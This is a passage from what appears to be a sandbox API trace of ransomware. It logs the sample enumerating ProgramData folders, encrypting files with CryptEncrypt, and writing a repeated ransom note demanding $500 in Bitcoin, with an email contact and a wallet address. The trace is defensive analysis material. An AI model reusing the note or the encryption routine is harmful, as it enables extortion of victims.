(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.027] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0066.027] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.027] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0066.027] CloseHandle (hObject=0xd4) returned 1 [0066.027] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0066.027] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0066.027] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\RESTORE_FILES.txt") returned 64 [0066.027] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.037] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.037] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0066.038] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.038] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0066.038] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.038] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0066.038] CloseHandle (hObject=0xb4) returned 1 [0066.039] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.039] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.039] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\RESTORE_FILES.txt") returned 59 [0066.039] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.039] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.039] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.040] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.040] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.040] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.040] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0066.040] CloseHandle (hObject=0xa4) returned 1 [0066.040] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.040] lstrcmpiW (lpString1="DeviceSync", lpString2="Windows") returned -1 [0066.040] lstrcmpiW (lpString1="DeviceSync", lpString2="Program Files") returned -1 [0066.040] lstrcmpiW (lpString1="DeviceSync", lpString2="Program Files (x86)") returned -1 [0066.040] lstrcmpiW (lpString1="DeviceSync", lpString2="$Recycle.bin") returned 1 [0066.040] lstrcmpiW (lpString1="DeviceSync", lpString2="System Volume Information") returned -1 [0066.040] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync") returned 39 [0066.040] lstrcmpW (lpString1="DeviceSync", lpString2=".") returned 1 [0066.040] lstrcmpW (lpString1="DeviceSync", lpString2="..") returned 1 [0066.040] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*") returned 41 [0066.040] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.041] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.041] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.041] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.041] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.041] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.041] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\.") returned 41 [0066.041] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.041] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.041] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.041] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.041] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.041] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.041] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.041] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\..") returned 42 [0066.041] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.041] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.041] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.041] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.041] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\RESTORE_FILES.txt") returned 57 [0066.041] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\devicesync\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.042] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.042] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.043] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.043] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.043] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.043] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0066.043] CloseHandle (hObject=0xa4) returned 1 [0066.043] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.043] lstrcmpiW (lpString1="DRM", lpString2="Windows") returned -1 [0066.043] lstrcmpiW (lpString1="DRM", lpString2="Program Files") returned -1 [0066.043] lstrcmpiW (lpString1="DRM", lpString2="Program Files (x86)") returned -1 [0066.043] lstrcmpiW (lpString1="DRM", lpString2="$Recycle.bin") returned 1 [0066.043] lstrcmpiW (lpString1="DRM", lpString2="System Volume Information") returned -1 [0066.043] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM") returned 32 [0066.043] lstrcmpW (lpString1="DRM", lpString2=".") returned 1 [0066.043] lstrcmpW (lpString1="DRM", lpString2="..") returned 1 [0066.043] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*") returned 34 [0066.043] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.043] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.043] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.043] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.043] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.044] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.044] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\.") returned 34 [0066.044] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.044] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.044] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.044] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.044] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.044] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.044] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.044] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\..") returned 35 [0066.044] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.044] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.044] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.044] lstrcmpiW (lpString1="Server", lpString2="Windows") returned -1 [0066.044] lstrcmpiW (lpString1="Server", lpString2="Program Files") returned 1 [0066.044] lstrcmpiW (lpString1="Server", lpString2="Program Files (x86)") returned 1 [0066.044] lstrcmpiW (lpString1="Server", lpString2="$Recycle.bin") returned 1 [0066.044] lstrcmpiW (lpString1="Server", lpString2="System Volume Information") returned -1 [0066.044] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server") returned 39 [0066.044] lstrcmpW (lpString1="Server", lpString2=".") returned 1 [0066.044] lstrcmpW (lpString1="Server", lpString2="..") returned 1 [0066.044] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*") returned 41 [0066.044] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0066.044] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.044] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.044] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.044] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.044] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.044] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\.") returned 41 [0066.044] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.044] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0066.044] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0066.044] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0066.044] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0066.044] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\." (normalized: "c:\\programdata\\microsoft\\drm\\server\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.045] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0066.045] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.045] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.045] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.045] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.045] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.045] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\..") returned 42 [0066.045] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.045] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.045] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0066.045] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0066.045] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0066.045] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0066.045] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\.." (normalized: "c:\\programdata\\microsoft\\drm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.045] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0066.045] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0066.045] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\RESTORE_FILES.txt") returned 57 [0066.045] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\drm\\server\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.045] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.045] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0066.046] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.046] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 